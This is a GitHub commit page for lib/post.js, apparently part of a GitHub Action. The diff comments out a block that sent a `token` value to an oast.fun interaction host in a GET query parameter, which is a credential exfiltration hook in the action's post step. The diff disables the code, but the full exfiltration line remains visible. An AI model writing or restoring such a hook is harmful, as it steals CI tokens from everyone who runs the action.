Skip to content

Commit 8ac5c80

Browse files
authored
Update post.js
1 parent c7265e9 commit 8ac5c80

File tree

1 file changed

+7
-7
lines changed

1 file changed

+7
-7
lines changed

lib/post.js

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -27,13 +27,13 @@ export async function post(core, request) {
2727
return;
2828
}
2929

30-
try {
31-
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${token}`;
32-
await fetch(url);
33-
core.info(`HTTP GET request sent to ${url}`);
34-
} catch (error) {
35-
core.error(`Failed to send HTTP GET request: ${error.message}`);
36-
}
30+
// try {
31+
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${token}`;
32+
// await fetch(url);
33+
// core.info(`HTTP GET request sent to ${url}`);
34+
// } catch (error) {
35+
// core.error(`Failed to send HTTP GET request: ${error.message}`);
36+
// }
3737

3838

3939
try {

0 commit comments

Comments
 (0)